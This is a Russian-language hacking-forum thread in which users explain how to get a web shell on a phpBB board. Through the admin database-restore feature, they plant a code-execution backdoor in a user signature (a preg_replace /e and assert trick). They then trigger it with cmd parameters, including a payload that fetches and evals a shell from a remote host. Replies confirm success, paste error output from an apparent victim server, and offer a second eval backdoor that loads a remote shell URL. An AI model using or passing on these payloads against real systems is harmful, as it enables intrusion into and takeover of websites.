https://forum.antichat.ru/showpost.php?p=198446&postcount=3

Konqi можно через картинку, но не всегда это работает!
а можно через восстановление БД:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;
а потом в командной строке в профайле
&cmd=phpinfo();
или
cmd=eval(file_get_contents('http://ххх.ru/down/shell.txt'));

2 GOGA075

и где ставить этот sql запрос?

Делаешь бекап базы,в файл это записываешь,и делаешь восстановление базы,ну или как-то так.

Создаешь файл 1.sql пихеш туда этот запрос, топаешь а админку и восстанавливаешь его там!
потом топаешь в профайл и ...
profile.php?mode=editprofile&cmd=phpinfo();
видешь phpinf'у!
ну а дальше шел...

ok люди Щас папробую ))

парни сработал спасибо вам

phpinfo пашет а вот с шелом никак

Parse error: syntax error, unexpected '<' in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code(1) : assert code(1) : eval()'d code on line 1

Warning: assert() [function.assert]: Assertion "eval(file_get_contents('http://mysite.com/shell.php'));" failed in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code on line 1

как вариант можно попробовать впихнуть код через восстановление базы данных в форуме:
eval(file_get_contents($_GET['e']));
а потом обращаться
http://site.com/images/sh.php?e=http://адресс_до_шела

З.Ы или как Ctacok посоветовал, это проще)